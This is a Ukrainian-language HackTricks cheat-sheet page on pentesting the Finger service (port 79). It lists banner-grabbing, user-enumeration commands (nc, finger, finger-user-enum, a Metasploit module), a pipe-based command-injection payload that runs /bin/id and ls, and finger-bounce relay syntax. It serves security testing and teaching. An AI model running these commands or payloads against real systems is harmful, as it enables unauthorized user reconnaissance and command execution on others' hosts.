79 - Pentesting Finger
Reading time: 2 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Основна інформація
Програма/сервіс Finger використовується для отримання деталей про комп'ютерних користувачів. Зазвичай надається інформація, яка включає ім'я користувача, повне ім'я, а в деяких випадках, додаткові деталі. Ці додаткові деталі можуть включати місцезнаходження офісу та номер телефону (якщо доступно), час, коли користувач увійшов, період бездіяльності (idle time), останній раз, коли користувач читав електронну пошту, та вміст планів і проектних файлів користувача.
Порт за замовчуванням: 79
PORT STATE SERVICE
79/tcp open finger
Перерахунок
Отримання банера/Базове з'єднання
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Перерахунок користувачів
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, деякі приклади:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap виконує скрипт для використання стандартних скриптів
Metasploit використовує більше трюків, ніж Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Виконання команд
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Використовуйте систему як реле для finger
finger user@host@victim
finger @internal@external
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.